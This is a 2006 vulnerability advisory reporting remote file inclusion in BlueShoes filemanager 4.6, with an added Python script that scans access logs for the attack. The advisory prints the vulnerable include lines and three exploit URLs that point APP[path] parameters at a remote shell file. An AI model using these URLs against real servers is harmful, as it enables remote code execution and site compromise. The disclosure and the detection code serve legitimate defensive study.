New Vulnerability

2006-10-31T00:00:00
ID SECURITYVULNS:DOC:14870
Type securityvulns
Reporter Securityvulns
Modified 2006-10-31T00:00:00

Description

blueshoes-filemanager-4.6_public

$it£ :

www.blueshoes.org

Remote File Include Vulnerability (APP[path][core])

Auth0r : x_w0x

c0ntact : x_w0x[at]Hotmail[d0t]com

w£lc0m£ In x0|0x

=======================================================

C0d£ :

=====

./file.php
require_once($APP['path']['core'] . 'util/Bs_UnitConverter.class.php');
require_once($APP['path']['core'] . 'net/http/Bs_Browscap.class.php');

-global.conf.php
include_once($APP['path']['bsRoot'] . 'blueshoes.ini.php');

-viewer.php
require_once($APP['path']['core'] . 'file/Bs_FileSystem.class.php');
require_once($APP['path']['core'] . 'file/Bs_FileUtil.class.php');

£xpl0it:

=====

http://host.com/[path]/applications/flemanager/file.php?APP[path][core]=$h£ll.txt?
http://host.com/[path]/applications/flemanager/global.conf.php?APP[path][bsRoot]=$h£ll.txt?
http://host.com/[path]/applications/flemanager/viewer.php?APP[path][bsRoot]=$h£ll.txt?

Gr££tz : makoki , azzcoder ,xoron , osm@n
$p£cial Gr££tz : str0k ,elite-team and all H4ck£r$ 0_°

Ramadan Karima all musulmano ^_*

Download : http://download.blueshoes.org/blueshoes-filemanager-4.6_public.zip
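For defenders, the requests described above can be found in web server access logs by looking for any query parameter that supplies an APP[...] array, since the scripts expect $APP to be set by the application and not by the client. The following is an added example, not part of the original advisory or the BlueShoes code; the log format (Combined Log Format), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Matches the parameter names from the advisory (APP[path][core],
# APP[path][bsRoot]) and any other request-supplied APP[...] key.
# Case-sensitive on purpose: PHP variable names are case-sensitive.
APP_KEY = re.compile(r"^APP(\[[^\]]*\])+$")
# Request line inside a Combined Log Format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; paths follow the URLs shown in the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Oct/2006:10:00:01 +0000] '
    '"GET /applications/flemanager/viewer.php?file=a.txt HTTP/1.1" 200 512',
    '192.0.2.77 - - [31/Oct/2006:10:00:05 +0000] '
    '"GET /applications/flemanager/file.php'
    '?APP[path][core]=http://example.invalid/x.txt? HTTP/1.1" 200 90',
    '192.0.2.77 - - [31/Oct/2006:10:00:09 +0000] '
    '"GET /applications/flemanager/global.conf.php'
    '?APP%5Bpath%5D%5BbsRoot%5D=/tmp/ HTTP/1.0" 200 0',
]


def app_overrides(log_line):
    """Return [(key, value, is_remote)] for each APP[...] query parameter."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    hits = []
    # parse_qsl percent-decodes once, so APP%5Bpath%5D... is caught too.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if APP_KEY.match(key):
            # A scheme in the value means the include path points off-host.
            hits.append((key, value, "://" in value))
    return hits


def scan(lines):
    """Return (line_number, key, value, is_remote) for every flagged parameter."""
    return [(n, *hit) for n, line in enumerate(lines, 1)
            for hit in app_overrides(line)]


if __name__ == "__main__":
    for n, key, value, remote in scan(SAMPLE_LOG):
        print(f"line {n}: {key}={value!r} remote={remote}")
```

Access logs record only the query string, so a parameter delivered in a request body would not be seen by this check.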

